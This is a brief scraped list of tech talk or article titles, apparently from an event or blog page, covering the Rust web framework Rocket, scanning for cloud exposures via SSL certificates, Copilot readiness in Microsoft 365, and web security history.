Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 

Evolution Of Web Security